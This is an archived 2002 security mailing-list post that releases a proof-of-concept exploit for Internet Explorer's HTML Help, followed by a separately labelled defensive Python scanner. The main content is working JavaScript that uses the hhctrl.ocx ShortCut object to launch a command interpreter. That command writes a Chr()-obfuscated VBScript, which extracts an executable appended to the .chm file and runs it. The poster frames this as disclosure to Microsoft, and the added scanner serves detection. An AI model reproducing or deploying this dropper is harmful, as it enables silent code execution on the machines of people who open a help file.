Re: HELP ! : Trojanised HTML: Internet Explorer 5 and 6 [technical exercise]

From: dzzieat_private
Date: Fri Feb 08 2002 - 02:38:47 PST


    > technical note: the possibility is excellent to repeat the entire 
    > process above directly inside the *.chm file and drop an *.exe from 
    > within the *.chm into the same Temporary Internet File. Using our 
    > Guninski scripting to determine the location of the *.chm and write 
    > that to the link parameter within it: value="'+path+'\\malware
    > [1].exe"> and execute it.
    
    
    I made a proof of concept on a chm exe dropper a while back,
    I guess now's as good a time as any to release it...that 
    command execution thing in a chm is really dangerous. A chm
    is about the same as running an exe right now.
    
    Note this works from the Internet Temp files directory as well, all 
    someone has to do is choose the open option when they click a link
    to a chm file, and they are done. 
    
    I am not going to distribute a prepackaged example, no good could 
    come of that. Below is the html script that is capable of it. It is 
    a sufficient enough process to assemble the package as to keep it 
    out of the hands of the kids. 
    
    I will email MS with a link to a working sample for them to examine.
    
    Also remember the mechanism for this exploit was exposed about a year
    ago (?) so I am sure other things have been done with this and it is
    still a viable hole.
    
    -------------------------------------------------
    flow of events
    -------------------------------------------------
    
    1) chm opens 
         a) determines absolute path current folder
         b) determines parent chm name (in case cached changes name)
         c) detects winNT or win98 to work on both
    
    2) chm name is used to auto generate vbs script data
       abs path is used to auto generate html object data
       script writes dynamically generated content to window
    
    3) first object activated programmatically....vbs script is echoed 
       into existence into same folder as parent chm file
    
    4) waits 1 sec then activates echoed.vbs file...this vbs file
       reads the parent .chm and extracts a hello world exe that is
       appended onto the chm file. 
    
    5) after exe is written to disk vbs script then activates it 
    
    -------------------------------------------------------------
    script below
    -------------------------------------------------------------
    
    
    msg='<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\</h1></center>'
    
    function getChmAbsPath(){
         t=unescape(location.href)
         return t.substring(t.indexOf(":",4)+1,t.lastIndexOf("\\")+1)
    }
    
    function getChmName(){
    	l=unescape(location.href)
    	chmName=l.substring(l.lastIndexOf("\\")+1,l.lastIndexOf(":")-1)
    	t='Chr(92)+'
    	for(i=0;i<chmName.length;i++){
    	    t+= 'Chr(' + chmName.charCodeAt(i) + ')+'
    	}
    	return t.substring(0,t.length-1);
    }
    
    function getInterpreter(){	
        if(navigator.userAgent.indexOf('NT') > 0){
           return 'cmd';
        }else{
           return 'command';
        } 
    }
    
    vbs='fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):'+
        'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):'+
        'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):'+
        'set i=createobject(fso):'+
        'set o=createobject(fso):'+
        'set w=createobject(wsc):'+
        'pf=i.GetParentFolderName(WSCript.ScriptFullName):'+
        'infile=pf+' + getChmName() + ':'+
        'outfile=pf+exename:'+
        'OFFSET=XXXXXXX:'+
        'Set ii=i.OpenTextFile(infile):'+
        'Set oo=o.OpenTextFile(outfile,2,True):'+
        'ii.Read OFFSET:'+
        'While Not ii.AtEndOfStream:'+
        'oo.Write Chr(Asc(ii.Read(1))):'+
        'Wend:ii.close:oo.close:'+
        'w.Run chr(34)+outfile+chr(34)'
    
    hit='<OBJECT id=shortcut^ type="application/x-oleobject"  '+
        'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" '+
        'codebase="hhctrl.ocx\#Version=4,72,8252,0" width=100 '+
        'height=100><PARAM name="Command" value="ShortCut">   '+
        '<PARAM name="Text" value="Text: ">                   '+
        '<PARAM name="Item1" value=\',*\'>                    '+
        '<PARAM name="Item2" value="273,1,1"></OBJECT>        '
    
    scriptPath = getChmAbsPath() + 'echoed.vbs'
    
    cmd=new Array
    cmd[1]= getInterpreter() + ',/c echo ' + vbs + ' > "' + scriptPath + '"'
    cmd[2]='wscript,"' + scriptPath + '"'
    
    function replace(h,i,c){
    	h = h.split('^').join(i).split('*').join(c)
        return h
    }
    
    hit1=replace(hit,1,cmd[1])
    hit2=replace(hit,2,cmd[2])
    
    document.write(hit1+hit2+msg)
    shortcut1.Click()
    setTimeout("shortcut2.Click()",1000)
    
    
    
    __________________________________________________________________________
    http://geocities.com/dzzie
    __________________________________________________________________________
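Two defensive checks that follow from the post's flow of events, as an added example (not code from dzzie's message): a scanner for the hhctrl.ocx ShortCut object pattern in HTML (the CLSID is the one quoted in the script above) and an ITSF header parser that flags data appended after a CHM's declared total size, which is how step 4 carries its payload. The field offsets follow the unofficial CHM/ITSF format description; `make_test_chm` builds a constructed minimal header, not a real help file.

```python
import re, struct

HH_SHORTCUT_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"  # hhctrl.ocx, as quoted in the post
OBJECT_RE = re.compile(r"<object\b[^>]*>.*?</object>", re.I | re.S)
PARAM_RE = re.compile(
    r"""<param\s+name\s*=\s*["']?(\w+)["']?\s+value\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.I)

def find_hh_shortcuts(html):
    """Item1 (program,arguments) of every hhctrl ShortCut object found in html."""
    hits = []
    for m in OBJECT_RE.finditer(html):
        block = m.group(0)
        if HH_SHORTCUT_CLSID not in block.lower():
            continue
        params = {p.group(1).lower(): p.group(2) or p.group(3) or p.group(4) or ""
                  for p in PARAM_RE.finditer(block)}
        if params.get("command", "").lower() == "shortcut":
            hits.append(params.get("item1", ""))
    return hits

def chm_declared_size(data):
    """Total file size recorded in ITSF header section 0, or None if not a CHM."""
    if len(data) < 0x58 or data[:4] != b"ITSF":
        return None
    sec0_off, sec0_len = struct.unpack_from("<QQ", data, 0x38)  # header section table, entry 0
    if sec0_len < 0x18 or sec0_off + 0x18 > len(data):
        return None
    return struct.unpack_from("<Q", data, sec0_off + 8)[0]  # after DWORD 0x1FE and DWORD 0

def chm_overlay(data):  # bytes after the declared end; b'' if none, None if not a CHM
    declared = chm_declared_size(data)
    if declared is None or declared > len(data):
        return None
    return data[declared:]

def make_test_chm(payload=b""):
    """Constructed minimal ITSF v3 header (not a real CHM) plus an optional appended payload."""
    size = 0x60 + 0x18
    hdr = b"ITSF" + struct.pack("<IIII", 3, 0x60, 1, 0)  # version, header length, unknown, timestamp
    hdr += struct.pack("<I", 0x409) + bytes(32)          # language id, two zeroed GUIDs
    hdr += struct.pack("<QQQQ", 0x60, 0x18, size, 0)     # section table: sec0 (off,len), sec1 (empty)
    hdr += struct.pack("<Q", size)                       # v3 only: offset of content section 0
    return hdr + struct.pack("<IIQII", 0x1FE, 0, size, 0, 0) + payload

# Constructed sample page: one hhctrl ShortCut object and one unrelated (zero CLSID) object.
SAMPLE_HTML = ('<OBJECT id=s1 classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">'
               '<PARAM name="Command" value="ShortCut"><PARAM name="Item1" value=",wscript,echoed.vbs">'
               '</OBJECT><OBJECT classid="clsid:00000000-0000-0000-0000-000000000000">'
               '<PARAM name="Command" value="ShortCut"></OBJECT>')
```

A non-empty overlay is only an indicator; legitimately signed or patched help files can also carry trailing bytes, so treat it as a triage signal alongside the ShortCut scan rather than a verdict.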
    
       
    



    This archive was generated by hypermail 2b30 : Sun Feb 10 2002 - 00:35:44 PST